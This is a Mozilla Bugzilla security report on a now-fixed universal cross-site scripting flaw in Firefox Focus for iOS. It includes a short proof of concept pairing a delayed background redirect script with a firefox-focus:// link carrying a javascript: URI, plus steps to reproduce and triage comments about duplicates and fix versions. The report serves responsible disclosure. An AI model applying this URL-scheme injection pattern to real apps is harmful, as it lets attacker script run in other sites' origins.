Full UXSS via opening Firefox Focus externally after silent background navigation
Categories
(Focus :: Security: iOS, defect)
Tracking
(firefox123 fixed)
Tracking | Status | |
---|---|---|
firefox123 | --- | fixed |
People
(Reporter: proof131072, Unassigned)
Details
(Keywords: csectype-sop, reporter-external, sec-high, Whiteboard: [reporter-external] [client-bounty-form] [verif?])
Attachments
(5 files)
We are able to achieve Full UXSS by calling iOS Firefox Focus externally after silent background navigation.
PoC:
https://pwning.click/googleloc.php (Open in Firefox Focus and leave the browser, last thing user has seen is only
https://pwning.click/googleloc.php)
<script>setTimeout(function() {location="https://google.com"}, 3000);</script>
https://pwning.click/focuslink.php (Open with other browsers/apps like iOS Chrome)
<a href="firefox-focus://open-url?url=javascript:document.write(document.domain)">Open with Firefox Focus</a>
This is all possible (Full UXSS) because iOS Firefox Focus allows silent background navigation while user left the browser.
Updated•11 months ago
|
Updated•11 months ago
|
Comment 2•11 months ago
|
||
This is similar to Firefox iOS bug https://bugzilla.mozilla.org/show_bug.cgi?id=1850158
Is that running javascript URI with firefox URI? that doesn't become UXSS on Firefox but it does become Full UXSS on Focus, which is very serious issue.
Updated•10 months ago
|
Please check this Apple default mail app case too: https://pwning.click/RPReplay_Final1705153539.mp4
Hi Nish, please confirm that your fix PR 3973 https://github.com/mozilla-mobile/focus-ios/pull/3973 for https://pwning.click/focuslink.php on https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c10 is identical to this 1863831 report: https://pwning.click/focuslink.php
Here's a summary from the above comment and links. Could you confirm this is accurate :james?
Steps to reproduce
- Navigate to
https://pwning.click/googleloc.php
- Leave Focus application (by moving it to background)
- Open Safari
- Navigate to
https://pwning.click/focuslink.php
in Safari - Click on the link "Open with Firefox Focus"
Actual behavior
Focus is opened and JavaScript is running
Expected behavior
Focus is opened and JavaScript should not be running
Yeah that's correct, this had same steps to the one Nish told Andrei https://bugzilla.mozilla.org/show_bug.cgi?id=1860075#c14
Thanks for confirming!
We can now close this report so the new one Andrew added for See Also which is https://bugzilla.mozilla.org/show_bug.cgi?id=1876851 can also be tracked correctly in the future. Thanks!
Ok I'll marked it as duplicate of 1876851 so we keep only one bug open for those STR listed here.
Reporter | ||
Comment 11•8 months ago
|
||
Thanks, but I believe this should be marked as resolved not duplicate due to https://github.com/mozilla-mobile/focus-ios/commit/0ecc6ed809a65c408c2216b9fe45abf9185f96eb for v122.
Ok I can make that change
Updated•8 months ago
|
Updated•8 months ago
|
Comment 15•8 months ago
|
||
Hey, sorry for the hassle, but could you update the tracking flags to indicate which version it was fixed it? It helps us with bookkeeping. Thank you!
Comment 17•8 months ago
|
||
Putting the needinfo back: looks like it was inadvertently removed when the advisory attachment was added. I suppose the advisory implies this was fixed in v123? It would still be nice to update the status flags to say that explicitly
Yes it was for v123! Hopefully I marked the right fields in the ticket here
Reporter | ||
Comment 19•8 months ago
|
||
This is supposed to be fixed on v122 https://github.com/mozilla-mobile/focus-ios/pull/3973
Ah sorry James you're right! Let me adjust this.
Reporter | ||
Comment 21•7 months ago
|
||
No worries, thanks!
Comment 22•7 months ago
|
||
status-firefox123: fixed is true, even if it's not the first version that was fixed. unfortunately we can't set the older fields as they get made read-only in bugzilla to reduce clutter.
Comment 23•7 months ago
|
||
This one is less universal than the previous one (involves user interaction with the other app) but still a valid UXSS
Updated•5 months ago
|
Updated•5 months ago
|
Updated•4 months ago
|
Updated•18 days ago
|
Description
•